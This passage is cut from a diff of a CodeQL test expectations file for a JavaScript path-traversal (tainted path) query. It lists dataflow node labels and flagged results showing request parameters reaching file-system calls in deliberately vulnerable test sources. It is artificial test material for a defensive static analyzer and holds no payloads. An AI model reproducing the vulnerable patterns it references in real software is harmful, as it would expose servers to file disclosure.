pathMod ... y.path) | +| normalizedPaths.js:160:35:160:48 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:165:19:165:22 | path | semmle.label | path | +| normalizedPaths.js:170:21:170:24 | path | semmle.label | path | +| normalizedPaths.js:174:7:174:27 | path | semmle.label | path | +| normalizedPaths.js:174:14:174:27 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:184:19:184:22 | path | semmle.label | path | +| normalizedPaths.js:187:21:187:24 | path | semmle.label | path | +| normalizedPaths.js:189:21:189:24 | path | semmle.label | path | +| normalizedPaths.js:192:21:192:24 | path | semmle.label | path | +| normalizedPaths.js:194:21:194:24 | path | semmle.label | path | +| normalizedPaths.js:199:21:199:24 | path | semmle.label | path | +| normalizedPaths.js:201:7:201:49 | normalizedPath | semmle.label | normalizedPath | +| normalizedPaths.js:201:24:201:49 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | +| normalizedPaths.js:201:45:201:48 | path | semmle.label | path | +| normalizedPaths.js:205:21:205:34 | normalizedPath | semmle.label | normalizedPath | +| normalizedPaths.js:208:21:208:34 | normalizedPath | semmle.label | normalizedPath | +| normalizedPaths.js:210:21:210:34 | normalizedPath | semmle.label | normalizedPath | +| normalizedPaths.js:214:7:214:49 | path | semmle.label | path | +| normalizedPaths.js:214:14:214:49 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | +| normalizedPaths.js:214:35:214:48 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:219:3:219:33 | path | semmle.label | path | +| normalizedPaths.js:219:10:219:33 | decodeU ... t(path) | semmle.label | decodeU ... t(path) | +| normalizedPaths.js:219:29:219:32 | path | semmle.label | path | +| normalizedPaths.js:222:21:222:24 | path | semmle.label | path | +| normalizedPaths.js:226:7:226:70 | path | semmle.label | path | +| normalizedPaths.js:226:14:226:49 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | +| normalizedPaths.js:226:14:226:70 | pathMod ... g, ' ') | semmle.label | pathMod ... g, ' ') | +| normalizedPaths.js:226:35:226:48 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:228:21:228:24 | path | semmle.label | path | +| normalizedPaths.js:236:7:236:47 | path | semmle.label | path | +| normalizedPaths.js:236:14:236:47 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | +| normalizedPaths.js:236:33:236:46 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:238:19:238:22 | path | semmle.label | path | +| normalizedPaths.js:245:21:245:24 | path | semmle.label | path | +| normalizedPaths.js:250:21:250:24 | path | semmle.label | path | +| normalizedPaths.js:254:7:254:47 | path | semmle.label | path | +| normalizedPaths.js:254:14:254:47 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | +| normalizedPaths.js:254:33:254:46 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:256:19:256:22 | path | semmle.label | path | +| normalizedPaths.js:262:21:262:24 | path | semmle.label | path | +| normalizedPaths.js:267:7:267:42 | newpath | semmle.label | newpath | +| normalizedPaths.js:267:17:267:42 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | +| normalizedPaths.js:267:38:267:41 | path | semmle.label | path | +| normalizedPaths.js:270:21:270:27 | newpath | semmle.label | newpath | +| normalizedPaths.js:275:7:275:42 | newpath | semmle.label | newpath | +| normalizedPaths.js:275:17:275:42 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | +| normalizedPaths.js:275:38:275:41 | path | semmle.label | path | +| normalizedPaths.js:278:21:278:27 | newpath | semmle.label | newpath | +| normalizedPaths.js:283:7:283:42 | newpath | semmle.label | newpath | +| normalizedPaths.js:283:17:283:42 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | +| normalizedPaths.js:283:38:283:41 | path | semmle.label | path | +| normalizedPaths.js:286:21:286:27 | newpath | semmle.label | newpath | +| normalizedPaths.js:291:7:291:42 | newpath | semmle.label | newpath | +| normalizedPaths.js:291:17:291:42 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | +| normalizedPaths.js:291:38:291:41 | path | semmle.label | path | +| normalizedPaths.js:296:21:296:27 | newpath | semmle.label | newpath | +| normalizedPaths.js:303:6:303:26 | path | semmle.label | path | +| normalizedPaths.js:303:13:303:26 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:304:18:304:21 | path | semmle.label | path | +| normalizedPaths.js:309:19:309:22 | path | semmle.label | path | +| normalizedPaths.js:313:19:313:22 | path | semmle.label | path | +| normalizedPaths.js:316:19:316:22 | path | semmle.label | path | +| normalizedPaths.js:320:6:320:49 | normalizedPath | semmle.label | normalizedPath | +| normalizedPaths.js:320:23:320:49 | pathMod ... , path) | semmle.label | pathMod ... , path) | +| normalizedPaths.js:320:45:320:48 | path | semmle.label | path | +| normalizedPaths.js:325:19:325:32 | normalizedPath | semmle.label | normalizedPath | +| normalizedPaths.js:332:19:332:32 | normalizedPath | semmle.label | normalizedPath | +| normalizedPaths.js:339:6:339:46 | path | semmle.label | path | +| normalizedPaths.js:339:13:339:46 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | +| normalizedPaths.js:339:32:339:45 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:341:18:341:21 | path | semmle.label | path | +| normalizedPaths.js:346:19:346:22 | path | semmle.label | path | +| normalizedPaths.js:354:7:354:27 | path | semmle.label | path | +| normalizedPaths.js:354:14:354:27 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:356:19:356:22 | path | semmle.label | path | +| normalizedPaths.js:358:7:358:51 | requestPath | semmle.label | requestPath | +| normalizedPaths.js:358:21:358:51 | pathMod ... , path) | semmle.label | pathMod ... , path) | +| normalizedPaths.js:358:47:358:50 | path | semmle.label | path | +| normalizedPaths.js:363:21:363:31 | requestPath | semmle.label | requestPath | +| normalizedPaths.js:377:7:377:27 | path | semmle.label | path | +| normalizedPaths.js:377:14:377:27 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:379:19:379:22 | path | semmle.label | path | +| normalizedPaths.js:381:19:381:29 | slash(path) | semmle.label | slash(path) | +| normalizedPaths.js:381:25:381:28 | path | semmle.label | path | +| normalizedPaths.js:385:7:385:46 | path | semmle.label | path | +| normalizedPaths.js:385:14:385:46 | pathMod ... uery.x) | semmle.label | pathMod ... uery.x) | +| normalizedPaths.js:385:35:385:45 | req.query.x | semmle.label | req.query.x | +| normalizedPaths.js:388:19:388:22 | path | semmle.label | path | +| normalizedPaths.js:399:21:399:24 | path | semmle.label | path | +| normalizedPaths.js:407:19:407:67 | pathMod ... t('/')) | semmle.label | pathMod ... t('/')) | +| normalizedPaths.js:407:45:407:55 | req.query.x | semmle.label | req.query.x | +| normalizedPaths.js:407:45:407:66 | req.que ... it('/') | semmle.label | req.que ... it('/') | +| normalizedPaths.js:408:19:408:60 | pathMod ... t('/')) | semmle.label | pathMod ... t('/')) | +| normalizedPaths.js:408:38:408:48 | req.query.x | semmle.label | req.query.x | +| normalizedPaths.js:408:38:408:59 | req.que ... it('/') | semmle.label | req.que ... it('/') | +| normalizedPaths.js:412:7:412:46 | path | semmle.label | path | +| normalizedPaths.js:412:14:412:46 | pathMod ... uery.x) | semmle.label | pathMod ... uery.x) | +| normalizedPaths.js:412:35:412:45 | req.query.x | semmle.label | req.query.x | +| normalizedPaths.js:415:19:415:22 | path | semmle.label | path | +| normalizedPaths.js:426:21:426:24 | path | semmle.label | path | +| other-fs-libraries.js:9:7:9:48 | path | semmle.label | path | +| other-fs-libraries.js:9:14:9:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| other-fs-libraries.js:9:14:9:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| other-fs-libraries.js:9:14:9:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| other-fs-libraries.js:9:24:9:30 | req.url | semmle.label | req.url | +| other-fs-libraries.js:11:19:11:22 | path | semmle.label | path | +| other-fs-libraries.js:12:27:12:30 | path | semmle.label | path | +| other-fs-libraries.js:13:24:13:27 | path | semmle.label | path | +| other-fs-libraries.js:14:27:14:30 | path | semmle.label | path | +| other-fs-libraries.js:16:34:16:37 | path | semmle.label | path | +| other-fs-libraries.js:17:35:17:38 | path | semmle.label | path | +| other-fs-libraries.js:19:56:19:59 | path | semmle.label | path | +| other-fs-libraries.js:24:35:24:38 | path | semmle.label | path | +| other-fs-libraries.js:38:7:38:48 | path | semmle.label | path | +| other-fs-libraries.js:38:14:38:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| other-fs-libraries.js:38:14:38:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| other-fs-libraries.js:38:14:38:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| other-fs-libraries.js:38:24:38:30 | req.url | semmle.label | req.url | +| other-fs-libraries.js:40:35:40:38 | path | semmle.label | path | +| other-fs-libraries.js:41:50:41:53 | path | semmle.label | path | +| other-fs-libraries.js:42:53:42:56 | path | semmle.label | path | +| other-fs-libraries.js:49:7:49:48 | path | semmle.label | path | +| other-fs-libraries.js:49:14:49:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| other-fs-libraries.js:49:14:49:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| other-fs-libraries.js:49:14:49:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| other-fs-libraries.js:49:24:49:30 | req.url | semmle.label | req.url | +| other-fs-libraries.js:51:19:51:22 | path | semmle.label | path | +| other-fs-libraries.js:52:24:52:27 | path | semmle.label | path | +| other-fs-libraries.js:54:36:54:39 | path | semmle.label | path | +| other-fs-libraries.js:55:36:55:39 | path | semmle.label | path | +| other-fs-libraries.js:57:46:57:49 | path | semmle.label | path | +| other-fs-libraries.js:59:39:59:42 | path | semmle.label | path | +| other-fs-libraries.js:62:43:62:46 | path | semmle.label | path | +| other-fs-libraries.js:63:51:63:54 | path | semmle.label | path | +| other-fs-libraries.js:68:7:68:48 | path | semmle.label | path | +| other-fs-libraries.js:68:14:68:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| other-fs-libraries.js:68:14:68:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| other-fs-libraries.js:68:14:68:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| other-fs-libraries.js:68:24:68:30 | req.url | semmle.label | req.url | +| other-fs-libraries.js:70:19:70:22 | path | semmle.label | path | +| other-fs-libraries.js:71:10:71:13 | path | semmle.label | path | +| other-fs-libraries.js:72:15:72:18 | path | semmle.label | path | +| other-fs-libraries.js:73:8:73:11 | path | semmle.label | path | +| other-fs-libraries.js:75:15:75:15 | x | semmle.label | x | +| other-fs-libraries.js:76:19:76:19 | x | semmle.label | x | +| other-fs-libraries.js:81:7:81:48 | path | semmle.label | path | +| other-fs-libraries.js:81:14:81:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| other-fs-libraries.js:81:14:81:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| other-fs-libraries.js:81:14:81:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| other-fs-libraries.js:81:24:81:30 | req.url | semmle.label | req.url | +| other-fs-libraries.js:83:16:83:19 | path | semmle.label | path | +| prettier.js:6:11:6:28 | p | semmle.label | p | +| prettier.js:6:13:6:13 | p | semmle.label | p | +| prettier.js:7:28:7:28 | p | semmle.label | p | +| prettier.js:11:44:11:44 | p | semmle.label | p | +| pupeteer.js:5:9:5:71 | tainted | semmle.label | tainted | +| pupeteer.js:5:19:5:71 | "dir/" ... t.data" | semmle.label | "dir/" ... t.data" | +| pupeteer.js:5:28:5:53 | parseTo ... t).name | semmle.label | parseTo ... t).name | +| pupeteer.js:9:28:9:34 | tainted | semmle.label | tainted | +| pupeteer.js:13:37:13:43 | tainted | semmle.label | tainted | +| sharedlib-repro.js:13:22:13:43 | req.par ... spaceId | semmle.label | req.par ... spaceId | +| sharedlib-repro.js:21:27:21:34 | filepath | semmle.label | filepath | +| sharedlib-repro.js:22:18:22:25 | filepath | semmle.label | filepath | +| tainted-access-paths.js:6:7:6:48 | path | semmle.label | path | +| tainted-access-paths.js:6:14:6:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| tainted-access-paths.js:6:14:6:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| tainted-access-paths.js:6:14:6:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| tainted-access-paths.js:6:24:6:30 | req.url | semmle.label | req.url | +| tainted-access-paths.js:8:19:8:22 | path | semmle.label | path | +| tainted-access-paths.js:10:7:10:36 | obj | semmle.label | obj | +| tainted-access-paths.js:10:33:10:36 | path | semmle.label | path | +| tainted-access-paths.js:12:19:12:21 | obj | semmle.label | obj | +| tainted-access-paths.js:12:19:12:25 | obj.sub | semmle.label | obj.sub | +| tainted-access-paths.js:26:19:26:21 | obj | semmle.label | obj | +| tainted-access-paths.js:26:19:26:26 | obj.sub3 | semmle.label | obj.sub3 | +| tainted-access-paths.js:29:21:29:23 | obj | semmle.label | obj | +| tainted-access-paths.js:29:21:29:28 | obj.sub4 | semmle.label | obj.sub4 | +| tainted-access-paths.js:30:23:30:25 | obj | semmle.label | obj | +| tainted-access-paths.js:30:23:30:30 | obj.sub4 | semmle.label | obj.sub4 | +| tainted-access-paths.js:31:23:31:25 | obj | semmle.label | obj | +| tainted-access-paths.js:31:23:31:30 | obj.sub4 | semmle.label | obj.sub4 | +| tainted-access-paths.js:39:7:39:48 | path | semmle.label | path | +| tainted-access-paths.js:39:14:39:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| tainted-access-paths.js:39:14:39:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| tainted-access-paths.js:39:14:39:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| tainted-access-paths.js:39:24:39:30 | req.url | semmle.label | req.url | +| tainted-access-paths.js:40:23:40:26 | path | semmle.label | path | +| tainted-access-paths.js:48:7:48:48 | path | semmle.label | path | +| tainted-access-paths.js:48:14:48:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| tainted-access-paths.js:48:14:48:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| tainted-access-paths.js:48:14:48:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| tainted-access-paths.js:48:24:48:30 | req.url | semmle.label | req.url | +| tainted-access-paths.js:49:10:49:13 | path | semmle.label | path | +| tainted-promise-steps.js:6:7:6:48 | path | semmle.label | path | +| tainted-promise-steps.js:6:14:6:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| tainted-promise-steps.js:6:14:6:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| tainted-promise-steps.js:6:14:6:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| tainted-promise-steps.js:6:24:6:30 | req.url | semmle.label | req.url | +| tainted-promise-steps.js:7:10:7:30 | Promise ... e(path) [PromiseValue] | semmle.label | Promise ... e(path) [PromiseValue] | +| tainted-promise-steps.js:7:26:7:29 | path | semmle.label | path | +| tainted-promise-steps.js:10:23:10:33 | pathPromise [PromiseValue] | semmle.label | pathPromise [PromiseValue] | +| tainted-promise-steps.js:11:19:11:35 | await pathPromise | semmle.label | await pathPromise | +| tainted-promise-steps.js:11:25:11:35 | pathPromise [PromiseValue] | semmle.label | pathPromise [PromiseValue] | +| tainted-promise-steps.js:12:3:12:13 | pathPromise [PromiseValue] | semmle.label | pathPromise [PromiseValue] | +| tainted-promise-steps.js:12:20:12:23 | path | semmle.label | path | +| tainted-promise-steps.js:12:44:12:47 | path | semmle.label | path | +| tainted-require.js:6:19:6:37 | req.param("module") | semmle.label | req.param("module") | +| tainted-require.js:11:29:11:47 | req.param("module") | semmle.label | req.param("module") | +| tainted-require.js:13:11:13:29 | req.param("module") | semmle.label | req.param("module") | +| tainted-sendFile.js:7:16:7:33 | req.param("gimme") | semmle.label | req.param("gimme") | +| tainted-sendFile.js:8:16:8:33 | req.param("gimme") | semmle.label | req.param("gimme") | +| tainted-sendFile.js:15:43:15:58 | req.param("dir") | semmle.label | req.param("dir") | +| tainted-sendFile.js:21:16:21:49 | path.re ... rams.x) | semmle.label | path.re ... rams.x) | +| tainted-sendFile.js:21:37:21:48 | req.params.x | semmle.label | req.params.x | +| tainted-sendFile.js:22:16:22:46 | path.jo ... rams.x) | semmle.label | path.jo ... rams.x) | +| tainted-sendFile.js:22:34:22:45 | req.params.x | semmle.label | req.params.x | +| tainted-sendFile.js:26:16:26:33 | req.param("gimme") | semmle.label | req.param("gimme") | +| tainted-sendFile.js:28:16:28:48 | homeDir ... arams.x | semmle.label | homeDir ... arams.x | +| tainted-sendFile.js:28:37:28:48 | req.params.x | semmle.label | req.params.x | +| tainted-sendFile.js:30:16:30:46 | path.jo ... rams.x) | semmle.label | path.jo ... rams.x) | +| tainted-sendFile.js:30:34:30:45 | req.params.x | semmle.label | req.params.x | +| tainted-sendFile.js:32:43:32:58 | req.param("dir") | semmle.label | req.param("dir") | +| tainted-string-steps.js:6:7:6:48 | path | semmle.label | path | +| tainted-string-steps.js:6:14:6:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| tainted-string-steps.js:6:14:6:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| tainted-string-steps.js:6:14:6:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| tainted-string-steps.js:6:24:6:30 | req.url | semmle.label | req.url | +| tainted-string-steps.js:8:18:8:21 | path | semmle.label | path | +| tainted-string-steps.js:8:18:8:34 | path.substring(4) | semmle.label | path.substring(4) | +| tainted-string-steps.js:9:18:9:21 | path | semmle.label | path | +| tainted-string-steps.js:9:18:9:37 | path.substring(0, i) | semmle.label | path.substring(0, i) | +| tainted-string-steps.js:10:18:10:21 | path | semmle.label | path | +| tainted-string-steps.js:10:18:10:31 | path.substr(4) | semmle.label | path.substr(4) | +| tainted-string-steps.js:11:18:11:21 | path | semmle.label | path | +| tainted-string-steps.js:11:18:11:30 | path.slice(4) | semmle.label | path.slice(4) | +| tainted-string-steps.js:13:18:13:21 | path | semmle.label | path | +| tainted-string-steps.js:13:18:13:37 | path.concat(unknown) | semmle.label | path.concat(unknown) | +| tainted-string-steps.js:14:18:14:37 | unknown.concat(path) | semmle.label | unknown.concat(path) | +| tainted-string-steps.js:14:33:14:36 | path | semmle.label | path | +| tainted-string-steps.js:15:18:15:46 | unknown ... , path) | semmle.label | unknown ... , path) | +| tainted-string-steps.js:15:42:15:45 | path | semmle.label | path | +| tainted-string-steps.js:17:18:17:21 | path | semmle.label | path | +| tainted-string-steps.js:17:18:17:28 | path.trim() | semmle.label | path.trim() | +| tainted-string-steps.js:18:18:18:21 | path | semmle.label | path | +| tainted-string-steps.js:18:18:18:35 | path.toLowerCase() | semmle.label | path.toLowerCase() | +| tainted-string-steps.js:22:18:22:21 | path | semmle.label | path | +| tainted-string-steps.js:22:18:22:32 | path.split('/') | semmle.label | path.split('/') | +| tainted-string-steps.js:22:18:22:35 | path.split('/')[i] | semmle.label | path.split('/')[i] | +| tainted-string-steps.js:23:18:23:21 | path | semmle.label | path | +| tainted-string-steps.js:23:18:23:33 | path.split(/\\//) | semmle.label | path.split(/\\//) | +| tainted-string-steps.js:23:18:23:36 | path.split(/\\//)[i] | semmle.label | path.split(/\\//)[i] | +| tainted-string-steps.js:24:18:24:21 | path | semmle.label | path | +| tainted-string-steps.js:24:18:24:32 | path.split("?") | semmle.label | path.split("?") | +| tainted-string-steps.js:24:18:24:35 | path.split("?")[0] | semmle.label | path.split("?")[0] | +| tainted-string-steps.js:26:18:26:21 | path | semmle.label | path | +| tainted-string-steps.js:26:18:26:36 | path.split(unknown) | semmle.label | path.split(unknown) | +| tainted-string-steps.js:26:18:26:45 | path.sp ... hatever | semmle.label | path.sp ... hatever | +| tainted-string-steps.js:27:18:27:21 | path | semmle.label | path | +| tainted-string-steps.js:27:18:27:36 | path.split(unknown) | semmle.label | path.split(unknown) | +| torrents.js:5:6:5:38 | name | semmle.label | name | +| torrents.js:5:13:5:38 | parseTo ... t).name | semmle.label | parseTo ... t).name | +| torrents.js:6:6:6:45 | loc | semmle.label | loc | +| torrents.js:6:12:6:45 | dir + " ... t.data" | semmle.label | dir + " ... t.data" | +| torrents.js:6:24:6:27 | name | semmle.label | name | +| torrents.js:7:25:7:27 | loc | semmle.label | loc | +| typescript.ts:9:7:9:48 | path | semmle.label | path | +| typescript.ts:9:14:9:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| typescript.ts:9:14:9:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| typescript.ts:9:14:9:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| typescript.ts:9:24:9:30 | req.url | semmle.label | req.url | +| typescript.ts:11:29:11:32 | path | semmle.label | path | +| typescript.ts:19:7:19:18 | path3 | semmle.label | path3 | +| typescript.ts:19:15:19:18 | path | semmle.label | path | +| typescript.ts:20:39:20:43 | path3 | semmle.label | path3 | +| typescript.ts:22:7:22:18 | path4 | semmle.label | path4 | +| typescript.ts:22:15:22:18 | path | semmle.label | path | +| typescript.ts:23:39:23:43 | path4 | semmle.label | path4 | +| typescript.ts:29:7:29:18 | path6 | semmle.label | path6 | +| typescript.ts:29:15:29:18 | path | semmle.label | path | +| typescript.ts:31:29:31:33 | path6 | semmle.label | path6 | +| views.js:1:43:1:55 | req.params[0] | semmle.label | req.params[0] | subpaths -#select -| TaintedPath-es6.js:10:26:10:45 | join("public", path) | TaintedPath-es6.js:7:20:7:26 | req.url | TaintedPath-es6.js:10:26:10:45 | join("public", path) | This path depends on a $@. | TaintedPath-es6.js:7:20:7:26 | req.url | user-provided value | -| TaintedPath.js:12:29:12:32 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:12:29:12:32 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | -| TaintedPath.js:15:29:15:48 | "/home/user/" + path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:15:29:15:48 | "/home/user/" + path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | -| TaintedPath.js:18:33:18:36 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:18:33:18:36 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | -| TaintedPath.js:21:33:21:36 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:21:33:21:36 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | -| TaintedPath.js:24:33:24:36 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:24:33:24:36 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | -| TaintedPath.js:33:31:33:34 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:33:31:33:34 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | -| TaintedPath.js:42:29:42:52 | pathMod ... e(path) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:42:29:42:52 | pathMod ... e(path) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:46:29:46:49 | pathMod ... n(path) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:46:29:46:49 | pathMod ... n(path) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:48:29:48:58 | pathMod ... ath, z) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:48:29:48:58 | pathMod ... ath, z) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:50:29:50:54 | pathMod ... e(path) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:50:29:50:54 | pathMod ... e(path) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:52:29:52:56 | pathMod ... , path) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:52:29:52:56 | pathMod ... , path) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:54:29:54:56 | pathMod ... ath, x) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:54:29:54:56 | pathMod ... ath, x) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:56:29:56:52 | pathMod ... e(path) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:56:29:56:52 | pathMod ... e(path) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:58:29:58:61 | pathMod ... ath, z) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:58:29:58:61 | pathMod ... ath, z) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:60:29:60:61 | pathMod ... h(path) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:60:29:60:61 | pathMod ... h(path) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:65:31:65:76 | require ... ).query | TaintedPath.js:65:63:65:69 | req.url | TaintedPath.js:65:31:65:76 | require ... ).query | This path depends on a $@. | TaintedPath.js:65:63:65:69 | req.url | user-provided value | -| TaintedPath.js:66:31:66:74 | require ... ).query | TaintedPath.js:66:61:66:67 | req.url | TaintedPath.js:66:31:66:74 | require ... ).query | This path depends on a $@. | TaintedPath.js:66:61:66:67 | req.url | user-provided value | -| TaintedPath.js:67:31:67:73 | require ... ).query | TaintedPath.js:67:60:67:66 | req.url | TaintedPath.js:67:31:67:73 | require ... ).query | This path depends on a $@. | TaintedPath.js:67:60:67:66 | req.url | user-provided value | -| TaintedPath.js:75:48:75:60 | req.params[0] | TaintedPath.js:75:48:75:60 | req.params[0] | TaintedPath.js:75:48:75:60 | req.params[0] | This path depends on a $@. | TaintedPath.js:75:48:75:60 | req.params[0] | user-provided value | -| TaintedPath.js:86:28:86:48 | fs.real ... c(path) | TaintedPath.js:84:23:84:29 | req.url | TaintedPath.js:86:28:86:48 | fs.real ... c(path) | This path depends on a $@. | TaintedPath.js:84:23:84:29 | req.url | user-provided value | -| TaintedPath.js:89:45:89:52 | realpath | TaintedPath.js:84:23:84:29 | req.url | TaintedPath.js:89:45:89:52 | realpath | This path depends on a $@. | TaintedPath.js:84:23:84:29 | req.url | user-provided value | -| TaintedPath.js:122:23:122:26 | path | TaintedPath.js:120:23:120:29 | req.url | TaintedPath.js:122:23:122:26 | path | This path depends on a $@. | TaintedPath.js:120:23:120:29 | req.url | user-provided value | -| TaintedPath.js:128:19:128:22 | path | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:128:19:128:22 | path | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:132:19:132:33 | split.join("/") | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:132:19:132:33 | split.join("/") | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:136:19:136:26 | split[x] | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:136:19:136:26 | split[x] | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:137:19:137:35 | prefix + split[x] | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:137:19:137:35 | prefix + split[x] | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:140:19:140:37 | concatted.join("/") | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:140:19:140:37 | concatted.join("/") | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:143:19:143:38 | concatted2.join("/") | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:143:19:143:38 | concatted2.join("/") | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:145:19:145:29 | split.pop() | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:145:19:145:29 | split.pop() | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:154:29:154:55 | path.re ... /g, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:154:29:154:55 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:160:29:160:52 | path.re ... /g, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:160:29:160:52 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:161:29:161:53 | path.re ... /g, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:161:29:161:53 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:162:29:162:51 | path.re ... /g, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:162:29:162:51 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:163:29:163:57 | path.re ... /g, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:163:29:163:57 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:178:29:178:73 | "prefix ... +/, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:178:29:178:73 | "prefix ... +/, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:179:29:179:84 | pathMod ... +/, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:179:29:179:84 | pathMod ... +/, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:187:29:187:49 | qs.pars ... rl).foo | TaintedPath.js:187:38:187:44 | req.url | 